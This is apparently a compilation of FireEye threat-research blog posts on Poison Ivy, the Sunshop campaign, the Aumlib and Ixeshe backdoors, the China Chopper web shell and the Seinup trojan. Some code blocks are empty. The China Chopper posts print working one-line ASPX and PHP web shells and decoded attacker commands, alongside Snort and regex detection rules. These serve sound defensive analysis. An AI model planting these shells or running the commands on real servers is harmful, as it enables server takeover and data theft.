$cert1 = {06 50 11 A5 BC BF 83 C0 93 28 16 5E 7E 85 27 75}

$cert2 = {03 e1 e1 aa a5 bc a1 9f ba 8c 42 05 8b 4a bf 28}

$cert3 = {0c c0 35 9c 9c 3c da 00 d7 e9 da 2d c6 ba 7b 6d}


1 of ($cert*)



















Poison Ivy: Assessing Damage and Extracting Intelligence

Today, our research team is publishing a report on the Poison Ivy family of remote access tools (RATs) along with a package of tools created to work as a balm of sorts — naturally, we’re calling the package “Calamine.”

In an era of sophisticated cyber attacks, you might wonder why we’re even bothering with this well-known, downright ancient pest. As we explain in the paper, dismissing Poison Ivy could be a costly mistake.

RATs may well be the hacker’s equivalent of training wheels, as they are often regarded in IT security circles. But despite their reputation as a software toy for novice “script kiddies,” RATs remain a linchpin of many sophisticated cyber attacks and are used by numerous threat actors.

Requiring little technical savvy, RATs offer unfettered access to compromised machines. They are deceptively simple — attackers can point and click their way through the target’s network to steal data and intellectual property. But they are often delivered as a key component of coordinated attacks that use previously unknown (zero-day) software flaws and clever social engineering.

Even as security professionals shrug off the threat, the presence of a RAT may in itself indicate a targeted attack known as an advanced persistent threat (APT). Unlike malware focused on opportunistic cybercrime (typically conducted by botnets of compromised machines), RATs require a live person on the other side of the attack.

Poison Ivy has been used in several high-profile malware campaigns, most infamously, the 2011 compromise of RSA SecurID data. The same year, Poison Ivy powered a coordinated attack dubbed “Nitro” against chemical makers, government offices, defense firms, and human-rights groups.

We have discovered several nation-state threat actors actively using Poison Ivy, including the following:

  • admin@338 — Active since 2008, this actor mostly targets the financial services industry, though we have also seen activity in the telecom, government, and defense sectors.
  • th3bug — First detected in 2009, this actor targets a number of industries, primarily higher education and healthcare.
  • menuPass — Also first detected in 2009, this actor targets U.S. and overseas defense contractors.

Understanding why Poison Ivy remains one of the most widely used RATs is easy. Controlled through a familiar Windows interface, it offers a bevy of handy features: key logging, screen capture, video capturing, file transfers, password theft, system administration, traffic relaying, and more.

Here is how a typical Poison Ivy attack works:

  1. The attacker sets up a custom PIVY server, tailoring details such as how Poison Ivy will install itself on the target computer, what features are enabled, the encryption password, and so on.
  2. The attacker sends the PIVY server installation file to the targeted computer. Typically, the attacker takes advantage of a zero-day flaw. The target executes the file by opening an infected email attachment, for example, or visiting a compromised website.
  3. The server installation file begins executing on the target machine. To avoid detection by anti-virus software, it downloads additional code as needed through an encrypted communication channel.
  4. Once the PIVY server is up and running on the target machine, the attacker uses a Windows GUI client to control the target computer.

Poison Ivy is so widely used that security professionals have a harder time tracing attacks that use the RAT to any particular attacker.

We hope to eliminate some of that anonymity with the Calamine package. The package, which enables organizations to easily monitor Poison Ivy’s behavior and communications, includes these components:

ChopShop[1] is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints. The FireEye PIVY module for ChopShop decrypts Poison Ivy network traffic.

PyCommands, meanwhile, are Python scripts that automate tasks for Immunity Debugger, a popular tool for reverse-engineering malware binaries.[2] The FireEye PyCommand script dumps configuration information from a running PIVY process on an infected endpoint, which can provide additional telemetry about the threat actor behind the attack.

FireEye is sharing the Calamine tools with the security community at large under the BSD 2-Clause license[3] for both commercial and non-commercial use worldwide.

By tracking the PIVY server activity, security professionals can find these telltale indicators:

  • The domains and IPs used for CnC
  • The attacker’s PIVY process mutex
  • The attacker’s PIVY password
  • The launcher code used in the malware droppers
  • A timeline of malware activity

The FireEye report explains how Calamine can connect these and other facets of the attack. This evidence is especially useful when it is correlated with multiple attacks that display the same identifying features. Combining these nitty-gritty details with big-picture intelligence can help profile threat attackers and enhance IT defenses.

Calamine may not stop determined APT actors from using Poison Ivy. But it can complicate their ability to hide behind this commodity RAT.

Full details are available, here:

[1] ChopShop is available for download at

[2] Immunity Debugger is available at

[3] For more information about the BSD 2-Clause License, see the Open Source Initiative’s template at

The Sunshop Campaign Continues

We recently detected what we believe is a continuation of the Sunshop campaign that we first revealed on May 20, 2013.

This follow-on to the Sunshop campaign started on July 17, 2013. In this latest wave the attackers inserted malicious redirects into a number of websites – at least two of which were also compromised in the May 2013 edition of this campaign. The most prominent sites compromised in this round of the campaign were maintained by a Human Rights organization and an organization involved in science and technology policy development.

The compromised websites redirected victims to www[.]vwalls[.]com/maxi/enough/wildpost/files/2977.html. This page was last modified on July 17, 2013 at 09:51:01 GMT and contained the following code:

<applet archive="MnDK6AQJbV9qSo15.jar" code="Xxploit.class" width="1" height="1">


A .jar file with the same filename and md5 hash of 8b88de786a219340ff04bc53de196f46 was uploaded to on July 19, 2013. This malicious .jar exploited CVE-2013-2423 and dropped an interesting variant of Trojan.APT.9002.

The dropped payload had a md5 hash of f4ba5fd0a4f32f92aef6d5c4d971bf14 and was compiled on June 25, 2013. This Trojan.APT.9002 variant called back to appupdate[.]myvnc[.]com. This domain resolved to – one of the same command and control IP address used in the Sunshop campaign.

A related .jar file with the filename fiUJ3OTjBWZEUH8H.jar (md5: 04ad4f479997ca7bf8de216a67e23972) was also found. This jar file was first uploaded to on July 17, 2013. This malicious jar also exploited CVE-2013-2423 and dropped a modified 9002 RAT payload with the md5 53c5570178403b6fbb423961c3831eb2. This variant called back to intelupdate[.]hopto[.]org which resolved to It is possible that fiUJ3OTjBWZEUH8H.jar was used first then swapped out for MnDK6AQJbV9qSo15.jar for this instantiation of the Sunshop campaign.


The typical 9002 variant sends the ascii characters ‘9002’ as the first 4-bytes of its communications back to the command and control server. In contrast, this modified variant sent the ascii characters ‘0113’ as the first 4-bytes back to its command and control server.

Variant Hex encoded Beacon between Victim and C2
9002 9002 39 30 30 32 0c 00 00 00 08 00 00 00 19 ff ff ff ff 00 00 00 00 11 00 00 39 30 30 32 0c 00 00 00 08 00 00 00 19 ff ff ff ff 00 00 00 00 11 00 00
0113 0113 30 31 31 33 0c 00 00 00 08 00 00 00 19 ff ff ff ff 00 00 00 00 11 00 00 30 31 31 33 0c 00 00 00 08 00 00 00 19 ff ff ff ff 00 00 00 00 11 00 00

This change, while seemingly minor, would evade signatures that looked for the entire 24-byte string of the beacon packet. Bytes 5 through 24 are constant across both variants and are therefore better candidates for signatures. FireEye detects both variants as Trojan.APT.9002.


We are almost certain that the same actors responsible for the original Sunshop campaign executed these most recent attacks. We observed the following commonalities between the two attack cycles:

- At least two of the same strategic websites were compromised

- A variant of the same Trojan.APT.9002 malware was dropped

- The same c2 IP,, was used in both attacks

While it is unclear what prompted the modification of the Trojan.APT.9002 backdoor, it is possible that the adversary felt this modification would increase the attacks chances of success.

It is also unclear how easy it is for the adversary to implement this change in the network protocol. This change could in theory be enabled through an easy to use GUI builder or it could as complex as making changes to the source code. The level of complexity of this change and availability of either a builder or the source code will dictate how often we would expect to see similar changes in this tool.

This example of evasion at the network level also demonstrates the importance of crafting robust signatures that will survive the changes in techniques, tactics and procedures made by the adversary.

Survival of the Fittest: New York Times Attackers Evolve Quickly

The attackers behind the breach of the New York Times’ computer network late last year appear to be mounting fresh assaults that leverage new and improved versions of malware.

The new campaigns mark the first significant stirrings from the group since it went silent in January in the wake of a detailed expose of the group and its exploits — and a retooling of what security researchers believe is a massive spying operation based in China [1].

The newest campaign uses updated versions of Aumlib and Ixeshe.

Aumlib, which for years has been used in targeted attacks, now encodes certain HTTP communications. FireEye researchers spotted the malware when analyzing a recent attempted attack on an organization involved in shaping economic policy.

And a new version of Ixeshe, which has been in service since 2009 to attack targets in East Asia, uses new network traffic patterns, possibly to evade traditional network security systems.

The updates are significant for both of the longstanding malware families; before this year, Aumlib had not changed since at least May 2011, and Ixeshe had not evolved since at least December 2011.


Cybercriminals are constantly evolving and adapting in their attempts to bypass computer network defenses. But, larger, more successful threat actors tend to evolve at a slower rate.

As long as these actors regularly achieve their objective (stealing sensitive data), they are not motivated to update or rethink their techniques, tactics, or procedures (TTPs). These threat actors’ tactics follow the same principles of evolution – successful techniques propagate, and unsuccessful ones are abandoned. Attackers do not change their approach unless an external force or environmental shift compels them to. As the old saying goes: If it ain’t broke, don’t fix it.

So when a larger, successful threat actor changes up tactics, the move always piques our attention. Naturally, our first priority is ensuring that we detect the new or altered TTPs. But we also attempt to figure out why the adversary changed — what broke? — so that we can predict if and when they will change again in the future.

We observed an example of this phenomenon around May. About four months after The New York Times publicized an attack on its network, the attackers behind the intrusion deployed updated versions of their Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe malware families [2].

The previous versions of Aumlib had not changed since at least May 2011, and Ixeshe had not evolved since at least December 2011.

We cannot say for sure whether the attackers were responding to the scrutiny they received in the wake of the episode. But we do know the change was sudden. Akin to turning a battleship, retooling TTPs of large threat actors is formidable. Such a move requires recoding malware, updating infrastructure, and possibly retraining workers on new processes.

The following sections detail the changes to Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe.


Aumlib has been used in targeted attacks for years. Older variants of this malware family generated the following POST request:

POST /bbs/info.asp HTTP/1.1

Data sent via this POST request transmitted in clear text in the following structure:


A recently observed malware sample (hash value 832f5e01be536da71d5b3f7e41938cfb) appears to be a modified variant of Aumlib.

The sample, which was deployed against an organization involved in shaping economic policy, was downloaded from the following URL:

status[.]acmetoy[.]com/DD/myScript.js or status[.]acmetoy[.]com/DD/css.css

The sample generated the following traffic:


This output reveals the following changes when compared with earlier variants:

  • The POST URI is changed to /bbs/search.asp (as mentioned, earlier Aumlib variants used a POST URI of /bbs/info.asp.)
  • The POST body is now encoded.

Additional requests from the sample generated the following traffic:


These subtle changes may be enough to circumvent existing IDS signatures designed to detect older variants of the Aumlib family.

The sample 832f5e01be536da71d5b3f7e41938cfb shares code with an older Aumlib variant with the hash cb3dcde34fd9ff0e19381d99b02f9692. The sample cb3dcde34fd9ff0e19381d99b02f9692 connected to documents[.]myPicture[.]info and www[.]documents[.]myPicture[.]info and as expected generated the a POST request to /bbs/info.asp.


Ixeshe has been used in targeted attacks since 2009, often against entities in East Asia [3]. Although the network traffic is encoded with a custom Base64 alphabet, the URI pattern has been largely consistent:

/[ACD] [EW]S[Numbers].jsp?[Base64]

We analyzed a recent sample that appears to have targeted entities in Taiwan, a target consistent with previous Ixeshe activity.


This sample (aa873ed803ca800ce92a39d9a683c644) exhibited network traffic that does not match the earlier pattern and therefore may evade existing network traffic signatures designed to detect Ixeshe related infections.


The Base64-encoded data still contains information including the victim’s hostname and IP address but also a “mark” or “campaign tag/code” that the threat actors use to keep track of their various attacks. The mark for this particular attack was [ll65].


Based on our observations, the most successful threat actors evolve slowly and deliberately. So when they do change, pay close attention.

Knowing how attackers’ strategy is shifting is crucial to detecting and defending against today’s advanced threats. But knowing the “why” is equally important. That additional degree of understanding can help organizations forecast when and how a threat actor might change their behavior — because if you successfully foil their attacks, they probably will.



[2] This actor is known as APT12 by Mandiant


Breaking Down the China Chopper Web Shell – Part II

Part II in a two-part series. Read Part I.


In Part I of this series, I described China Chopper's easy-to-use interface and advanced features — all the more remarkable considering the Web shell's tiny size: 73 bytes for the aspx version, 4 kilobytes on disk. In this post, I'll explain China Chopper's platform versatility, delivery mechanisms, traffic patterns, and detection. My hope is that armed with this information, you can eradicate this pest from your environment.


So what platform can China Chopper run on? Any Web server that is capable of running JSP, ASP, ASPX, PHP, or CFM. That's the majority of the Web application languages out there. What about operating systems? China Chopper is flexible enough to run transparently on both Windows and Linux. This OS and application flexibility makes this an even more dangerous Web shell.

In Part I of this series, we showed China Chopper executing on a Windows 2003 IIS server using ASPX. Now we will show it running on Linux with PHP. As shown in Figure 1, the contents of the PHP version are just as minimalistic:


Figure 1: This command is all that it takes to run on Linux with PHP.


While the available options differ depending on what platform China Chopper is running on, the file management features in Linux (see Figure 2) are similar to those in Windows.


Figure 2: File browsing on a target system running Linux


The database client example shown in Figure 3 is MySQL instead of MS-SQL, but it offers many of the same capabilities.


Figure 3: Database management from a target system running Linux


The virtual terminal looks familiar (Figure 4), but uses Linux commands instead of Windows because these are ultimately interpreted by the underlying operating system.


Figure 4: Virtual terminal from a target system running Linux


Delivery Mechanism

China Chopper's delivery mechanism can be very flexible due to the size, format, and simplicity of the malware's payload. This small, text-based payload can be delivered using any of the following mechanisms:

  • WebDAV file upload
  • JBoss jmx-console or Apache Tomcat management pages (For more details on this attack vector, read FireEye consultant Tony Lee’s explanation)
  • Remote exploit with a file drop
  • Lateral propagation from other access


Traffic Analysis

We have now seen the server side payload and the client that is used to control the Web shell. Now let's examine China Chopper's traffic. Fortunately, we have both the server and client components, so we can start a packet capture to view the contents of typical traffic. As shown in Figure 5, the client initiates the connection over TCP port 80 using the HTTP POST method.


Figure 5: A packet capture shows that the Web shell traffic is HTTP POST traffic over TCP port 80


Because this is TCP traffic, we can “follow the TCP” stream in Wireshark (a popular open-source network-protocol analyzer that works in Unix and Windows). In Figure 6, the traffic in red at the top is from the attacker (Web client). The traffic shown in blue at the bottom is the response from the target (Web shell).


Figure 6: After following the TCP stream, we can see that the majority of the attacker traffic is Base64 encoded.


As highlighted above, the majority of the attacker traffic appears to be Base64 encoded. This is not a problem, though, because it can be easily decoded. We use the “TextWizard” feature of the free Fiddler Web debugger to discover what the attacker is sending. (Note: %3D is a URL-encoded representation of the equal sign ("="). Fiddler needs this to be converted to an equals sign for proper decoding.)

Raw attacker traffic:


var err:Exception;try{eval(System.Text.Encoding.GetEncoding(65001).

GetString(System. Convert.FromBase64String










("ERROR:// "%2Berr.message);}Response.Write("|<-");Response.End();&z1=Y21k&z2=Y2QgL2QgImM6



As shown In Figure 9, the Fiddler Web debugger text wizard easily converts the raw traffic from Base64 to plain text.


Figure 9: Fiddler Web debugger decodes the Base64 traffic


Decoded traffic:












Finally we have something more readable. However, our Base64-decoded traffic is now attempting to decode more Base64 traffic that is being stored as z1 and z2. Going back to our attacker traffic, right after the end of the “Password” parameter, we see the z1 and z2 parameters.

I've highlighted Base64-encoded parameters z1 and z2 in the following output:



Base64-decoded parameters z1 and z2:

z1=cmdz2=cd /d "c:\inetpub\wwwroot\"&whoami&echo [S]&cd&echo [E]


That explains how the client communicates with the shell. The “Password” parameter passes the code to the payload to be executed. The z1 is cmd, and z2 contains the arguments to the command prompt sent via cmd /c. All output is sent to standard output (stdout) back to the attacker, which creates the following response to the whoami command and the present working directory:

->|nt authority\network service[S]C:\Inetpub\wwwroot[E]|<-



Now that we understand the contents of China Chopper and what its traffic looks like, we can focus on ways to detect this pest both at the network and the host level.


With a standard Snort IDS in place, this traffic can be caught with relative ease. Keith Tyler gives a basic IDS signature to work in his early China Chopper blog post:


alert tcp any any -> any 80 ( sid:900001; content:"base64_decode";

http_client_body;flow:to_server,established; content:"POST"; nocase;

http_method; ;msg:"Webshell Detected Apache";)


To reduce false positives, we have tightened the Snort IDS signature to focus on China Chopper by looking for contents of “FromBase64String” and “z1” as follows:


(msg: "China Chopper with first Command Detected";

flow:to_server,established; content: "FromBase64String";

content: "z1"; content:"POST"; nocase;http_method;



classtype:web-application-attack; sid: 900000101;)


The following IDS signature looks for content of “FromBase64String” and any combination of “z” followed by one to three digits — it would find "z1”, “z10”, or “z100” for example. The idea: if the first command (z1) is missed, you still catch subsequent commands.


(msg: "China Chopper with all Commands Detected"; flow:to_server,established;

content: "FromBase64String"; content: "z"; pcre: "/Z\d{1,3}/i"; content:"POST"; nocase;http_method;



classtype:web-application-attack; sid: 900000102;)


Both of these IDS signatures can be modified for further optimization when depth and offset are considered. Be sure to put a valid SID in before implementing and test the signature for performance.

Now that we have discussed detection at the network level, we will see that detection at the host level is also possible. Because the shells must contain a predictable syntax, we can quickly attempt to find files that have that code in play.


Many methods can be used to find files that contain China Chopper. The quickest and easiest method, especially on a Linux machine, is probably using regular expressions. As shown in Figure 10, a quick egrep across your Web directory can help identify infected files.

egrep -re ' [<][?]php\s\@eval[(]\$_POST\[.+\][)];[?][>]' *.php


Figure 10:  Using egrep to find this Web shell


As you can see in Figure 10, the egrep and regex commands are a powerful combination. While the regex may seem like gibberish, it really is not as bad as it seems. Ian Ahl has created a few regex tutorials that can help improve your regex skills. Here are two to get you started:

Windows also provides a way to search files using regular expressions by using the native findstr command.


Figure 11: Using findstr to locate China Chopper


You may have noticed that we had to change up the regex a bit. This was necessary to get around some of the ways that findstr interprets regex. The command you would run is as follows:

findstr /R "[<][?]php.\@eval[(]\$_POST.*[)];[?][>]" *.php


These examples show detection in the PHP shell. To find the ASPX shell, just modify the regex to fit the syntax of the ASPX shell as shown:

egrep -re '[<]\%\@\sPage\sLanguage=.Jscript.\%[>][<]\%eval.Request\.Item.+unsafe' *.aspx

findstr /R "[<]\%\@.Page.Language=.Jscript.\%[>][<]\%eval.Request\.Item.*unsafe" *.aspx


If you are not sure where all of the PHP or ASPX files are on a Windows host, you can use the dir command with some extended options to help you identify Web files that you may want to run our regex against (see Figure 12).

dir /S /A /B *.php



Figure 12: Recursive search through Windows using the dir command


Findstr also has an option to search all subdirectories (see Figure 13).

findstr /R /S "[<][?]php.\@eval[(]\$_POST.*[)];[?][>]" *.php



Figure 13: Using findstr to recursively locate multiple instances of the Web shell



I hope this explanation of China Chopper's features, platform versatility, delivery mechanisms, traffic analysis, and detection give you the knowledge and tools you need to eradicate this elegantly designed but dangerous menace.

Good hunting.

Breaking Down the China Chopper Web Shell – Part I

Part I in a two-part series.

China Chopper: The Little Malware That Could

China Chopper is a slick little web shell that does not get enough exposure and credit for its stealth. Other than a good blog post from security researcher Keith Tyler, we could find little useful information on China Chopper when we ran across it during an incident response engagement. So to contribute something new to the public knowledge base — especially for those who happen to find the China Chopper server-side payload on one of their Web servers — we studied the components, capabilities, payload attributes, and the detection rate of this 4 kilobyte menace.


China Chopper is a fairly simple backdoor in terms of components. It has two key components:the Web shell command-and-control (CnC) client binary and a text-based Web shell payload (server component). The text-based payload is so simple and short that an attacker could type it by hand right on the target server — no file transfer needed.

Web Shell Client

The Web shell client used to be available on, but we would advise against visiting that site now.

Web shell (CnC) Client MD5 Hash
caidao.exe caidao.exe 5001ef50c7e869253a7c152a638eab8a 5001ef50c7e869253a7c152a638eab8a

The client binary is packed with UPX and is 220,672 bytes in size, as shown in Figure 1.

Client binary viewed in WinHex

Figure 1: Client binary viewed in WinHex

Using the executable file compressor UPX to unpack the binary allows us to see some of the details that were hidden by the packer.

C:\Documents and Settings\Administrator\Desktop>upx -d
5001ef50c7e869253a7c152a638eab8a.exe -o decomp.exe
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2011
UPX 3.08w       Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011
File size         Ratio      Format      Name
--------------------   ------   -----------   -----------
700416 <-    220672   31.51%    win32/pe     decomp.exe
Unpacked 1 file.

Using PEiD (a free tool for detecting packers, cryptors and compilers found in PE executable files), we see that the unpacked client binary was written in Microsoft Visual C++ 6.0, as shown in Figure 2.


Figure 2: PEiD reveals that the binary was written using Visual C++ 6.0

Because the strings are not encoded, examining the printable strings in the unpacked binary provides insight into how the backdoor communicates. We were intrigued to see a reference to using the Chinese (simplified) language parameter (Figure 3) as well as references to the text “Chopper" (Figure 4).


Figure 3: Printable strings refer to


Figure 4: References to Chopper in the client binary

So we have highlighted some attributes of the client binary. But what does it look like in use? China Chopper is a menu-driven GUI full of convenient attack and victim-management features. Upon opening the client, you see example shell entries that point to, which originally hosted components of the Web shell.

To add your own target, right click within the client, select “Add” and enter the target IP address, password, and encoding as shown in Figure 5.


Figure 5: Picture of the China Chopper Web shell client binary

Server-side Payload Component

But the client is only half of the remote access tool — and not likely the part you would find on your network. Its communication relies on a payload in the form of a small Web application. This payload is available in a variety of languages such as ASP, ASPX, PHP, JSP, and CFM. Some of the original files that were available for download are shown with their MD5 hashes:

Web shell Payload MD5 Hash
Customize.aspx Customize.aspx 8aa603ee2454da64f4c70f24cc0b5e08 8aa603ee2454da64f4c70f24cc0b5e08
Customize.cfm Customize.cfm ad8288227240477a95fb023551773c84 ad8288227240477a95fb023551773c84
Customize.jsp Customize.jsp acba8115d027529763ea5c7ed6621499 acba8115d027529763ea5c7ed6621499


Even though the MD5s are useful, keep in mind that this is a text-based payload that can be easily changed, resulting in a new MD5 hash. We will discuss the payload attributes later, but here is an example of just one of the text-based payloads:


 <%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>

Note that “password” would be replaced with the actual password to be used in the client component when connecting to the Web shell.

In the next post, we provide regular expressions that can be used to find instances of this Web shell.


The capabilities of both the payload and the client are impressive considering their size.  The Web shell client contains a “Security Scan” feature, independent of the payload, which gives the attacker the ability to spider and use brute force password guessing against authentication portals.


Figure 6: China Chopper provides a “Security Scan” feature

In addition to vulnerability hunting, this Web shell has excellent CnC features when combining the client and payload, include the following:

  • File Management (File explorer)
  • Database Management (DB client)
  • Virtual Terminal (Command shell)

In China Chopper's main window, right-clicking one of the target URLs brings up a list of possible actions (see Figure 7).


Figure 7: Screenshot of the CnC client showing capabilities of the Web shell

File Management

Used as a remote access tool (RAT), China Chopper makes file management simple.  Abilities include uploading and downloading files to and from the victim, using the file-retrieval tool wget to download files from the Web to the target, editing, deleting, copying, renaming, and even changing the timestamp of the files.


Figure 8: File Management provides an easy to use menu that is activated by right-clicking on a file name

So just how stealthy is the “Modify the file time” option? Figure 9 shows the timestamps of the three files in the test directory before the Web shell modifies the timestamps. By default, Windows Explorer shows only the “Date Modified” field. So normally, our Web shell easily stands out because it is newer than the other two files.


Figure 9: IIS directory showing time stamps prior to the time modification

Figure 10 shows the date of the file after the Web shell modifies the timestamp. The modified time on our Web shell shows up as the same as the other two files. Because this is the default field displayed to users, it easily blends in to the untrained eye — especially with many files in the directory.


Figure 10: IIS directory showing time stamps after the time modification

Clever investigators may think that they can spot the suspicious file due to the creation date being changed to the same date as the modified date. But this is not necessarily anomalous. Additionally, even if the file is detected, the forensic timeline would be skewed because the date that the attacker planted the file is no longer present. To find the real date the file was planted, you need to go to the Master File Table (MFT). After acquiring the MFT using FTK, EnCase, or other means, we recommend using mftdump (available from Written by FireEye researcher Mike Spohn, mftdump is a great tool for extracting and analyzing file metadata.

The following table shows the timestamps pulled from the MFT for our Web shell file. We pulled the timestamps before and after the timestamps were modified. Notice that the “fn*” fields retain their original times, thus all is not lost for the investigator!

Category Pre-touch match Post-touch match
siCreateTime (UTC) siCreateTime (UTC) 6/6/2013 16:01 6/6/2013 16:01 2/21/2003 22:48 2/21/2003 22:48
siAccessTime (UTC) siAccessTime (UTC) 6/20/2013 1:41 6/20/2013 1:41 6/25/2013 18:56 6/25/2013 18:56
siModTime (UTC) siModTime (UTC) 6/7/2013 0:33 6/7/2013 0:33 2/21/2003 22:48 2/21/2003 22:48
siMFTModTime (UTC) siMFTModTime (UTC) 6/20/2013 1:54 6/20/2013 1:54 6/25/2013 18:56 6/25/2013 18:56
fnCreateTime (UTC) fnCreateTime (UTC) 6/6/2013 16:01 6/6/2013 16:01 6/6/2013 16:01 6/6/2013 16:01
fnAccessTime (UTC) fnAccessTime (UTC) 6/6/2013 16:03 6/6/2013 16:03 6/6/2013 16:03 6/6/2013 16:03
fnModTime (UTC) fnModTime (UTC) 6/4/2013 15:42 6/4/2013 15:42 6/4/2013 15:42 6/4/2013 15:42
fnMFTModTime (UTC) fnMFTModTime (UTC) 6/6/2013 16:04 6/6/2013 16:04 6/6/2013 16:04 6/6/2013 16:04

Database Management

The Database Management functionality is impressive and helpful to the first-time user.  Upon configuring the client, China Chopper provides example connection syntax.


Figure 11: Database Management requires simple configuration parameters to connect

After connecting, China Chopper also provides helpful SQL commands that you may want to run.


Figure 12: Database Management provides the ability to interact with a database and even provides helpful prepopulated commands

Command Shell Access

Finally, command shell access is provided for that OS level interaction you crave. What a versatile little Web shell!


Figure 13: Virtual Terminal provides a command shell for OS interaction

Payload Attributes

We stated above that this backdoor is stealthy due to a number of factors including the following:

  • Size
  • Server-side content
  • Client-side content
  • AV detection rate


Legitimate and illegitimate software usually suffer from the same principle: more features equals more code, which equals larger size. Considering how many features this Web shell contains, it is incredibly small — just 73 bytes for the aspx version, or 4 kilobytes on disk (see Figure 14). Compare that to other Web shells such as Laudanum (619 bytes) or RedTeam Pentesting (8,527 bytes). China Chopper is so small and simple that you could conceivably type the contents of the shell by hand.


Figure 14: China Chopper file properties

Server-Side Content

The server side content could easily be overlooked among the other files associated with a vanilla install of a complex application. The code does not look too evil in nature, but is curious.


Figure 15: The content of the file seems relatively benign, especially if you add a warm and fuzzy word like Security as the shell password

Below are the contents of the Web shell for two of its varieties.




 <%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>






 <?php @eval($_POST['password']);?>



Client-Side Content

Because all of the code is server-side language that does not generate any client-side code, browsing to the Web shell and viewing the source as a client reveals nothing.


Figure 16: Viewing the source of the web shell reveals nothing to the client

Anti-virus Detection Rate

Running the Web shell through the virus-scanning website No Virus Thanks shows a detection rate of 0 out of 14, indicating that most, if not all, anti-virus tools would miss the Web shell on an infected system.


Figure 17: Results of multiple anti-virus engine inspections showing China Chopper coming up clean

The same holds true for VirusTotal. None of its 47 anti-virus engines flags China Chopper as malicious.


Figure 18: Results of multiple AV engine inspections showing the Web shell comes up clean


We hope that this post has advanced the understanding of this compact, flexible, and stealthy Web shell. If you are reading this, you may be facing China Chopper right now — if so, we wish you success in eradicating this pest. In Part II, we examine the platform China Chopper runs on and describe its delivery mechanisms, traffic analysis and detection.

Trojan.APT.Seinup Hitting ASEAN

1. Executive Summary

The FireEye research team has recently identified a number of spear phishing activities targeting Asia and ASEAN. Of these, one of the spear phishing documents was suspected to have used a potentially stolen document as a decoy. The rich and contextual details (body and metadata) which are not available online lead us to believe this was stolen. This decoy document mentioned countries such as Brunei, Cambodia, Indonesia, Laos, Malaysia, Myanmar, Philippines, Singapore, Thailand, and Vietnam, which leads us to suspect that these countries are targeted. As the content of this decoy document is suspected to be a stolen sensitive document, the details will not be published.

This malware was found to have used a number of advance techniques which makes it interesting:

  1. The malware leverages Google Docs to perform redirection to evade callback detection. This technique was also found in the malware dubbed “Backdoor.Makadocs” reported by Takashi Katsuki (Katsuki, 2012).
  2. It is heavily equipped with a variety of cryptographic functions to perform some of its functions securely.
  3. The malicious DLL is manually loaded into memory which hides from DLL listing.

As depicted in the diagram below, the spear phishing document (which exploits CVE-2012-0158) creates a decoy document and a malware dropper named exp1ore.exe. This dropper will then drop wab.exe (Address Book Application) and wab32res.dll (malicious DLL) inside the temp folder. By running wab.exe, the malicious DLL named wab32res.dll (located within the same folder) will be loaded using DLL side-loading technique. This will in turn install a copy of wab32res.dll as msnetrsvw.exe inside the windows directory to be registered as Windows service. By registering as a Windows service, it allows the malware to survive every reboot and persist on the network.


Figure 1 Infection Flow

This malware is named “Trojan.APT.Seinup” because one of its export functions is named “seinup”. This malware was analysed to be a backdoor that allows the attacker to remote control the infected system.


Figure 2 Exported Functions

2. Related APT Domain and MD5

Based on our threat intelligence and reverse-engineering effort, below are some related domain and MD5 sums. Please note that some of the domain/IP association may change.

2.1. Related Domain


2.2. Associated Files

Name MD5 Comments
Spear-phishing document and decoy document Spear-phishing document and decoy document CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL
iexp1ore.exe iexp1ore.exe 137F3D11559E9D986D510AF34CB61FBC 137F3D11559E9D986D510AF34CB61FBC Dropper Dropper
wab.exe wab.exe CE67AAA163A4915BA408B2C1D5CCC7CC CE67AAA163A4915BA408B2C1D5CCC7CC Benign Address Book Application Benign Address Book Application
wab32res.dll wab32res.dll FB2FA42F052D0A86CBDCE03F5C46DD4D FB2FA42F052D0A86CBDCE03F5C46DD4D Malware to be side loaded when wab.exe is launched. Malware to be side loaded when wab.exe is launched.
msnetrsvw.exe msnetrsvw.exe FB2FA42F052D0A86CBDCE03F5C46DD4D FB2FA42F052D0A86CBDCE03F5C46DD4D Malware to be installed as a service. Note: This is the same as wab32res.dll. Malware to be installed as a service. Note: This is the same as wab32res.dll.
    baf227a9f0b21e710c65d01f2ab01244 baf227a9f0b21e710c65d01f2ab01244 Calls to Calls to
    0845f03d669e24144df785ee54f6ad74 0845f03d669e24144df785ee54f6ad74 Calls to Calls to
    d64a22ea3accc712aebaa047ab818b07 d64a22ea3accc712aebaa047ab818b07 Calls to Calls to
    56e6c27f9952e79d57d0b32d16c26811 56e6c27f9952e79d57d0b32d16c26811 Calls to Calls to
    cdd969121a2e755ef3dc1a7bf7f18b24 cdd969121a2e755ef3dc1a7bf7f18b24 Calls to Calls to
    709c71c128a876b73d034cde5e3ec1d3 709c71c128a876b73d034cde5e3ec1d3 Calls to Calls to

3. Interesting Technical Observations

3.1. Redirection Using Google Docs

By connecting the malicious server via Google Docs, the malicious communication is protected by the legitimate SSL provided by Google Docs (see Figure below). One possible way to examine the SSL traffic is to make use of a hardware SSL decrypter within an organisation. Alternatively, you may want to examine the usage pattern of the users. Suppose a particular user accesses Google Docs multiple times a day, the organization’s Incident Response team may want to dig deeper to find out if the traffic is triggered by a human or by malware.

Retrieve Command

Figure 3 Retrieve Command via Google Docs

Below is the code that is used to construct a URL that retrieves command via Google Docs. First, the malicious URL is constructed and then encoded. Next, the malware simply leverages the Google Docs viewer to retrieve the command from the malicious server (see Figure below). 4.GoogleDocs

Figure 4 View Command via GoogleDocs

3.2. Zero-Skipping XOR Encryption

The shellcode encryption technique is fairly standard. The shellcode has a decryption stub which decrypts its body using the XOR key 0x9E, and this shellcode is used to extract exp1ore.exe(malware) and Wor.doc (benign document).

The exp1ore.exe and Wor.doc were found within the spear phishing document encrypted using the same key (0xFC) and technique. The XOR key decrypts only a non-zero byte (see Figure 5). This prevents statistical methods of recovering the XOR key. The encrypted executable file and benign document were identified to be located inside the spear phishing document at offsets 0x2509 and 0x43509 respectively.


Figure 5 Zero Skipping XOR Encryption

Even though statistical methods may not be useful in identifying the XOR key as the zero bytes are not encrypted, we could use some of the “known” strings below to hunt for the XOR key in this situation. By sliding the known string across the array of bytes to perform a windowed XOR, the key would be revealed when the encoded data is XORed with the known string.

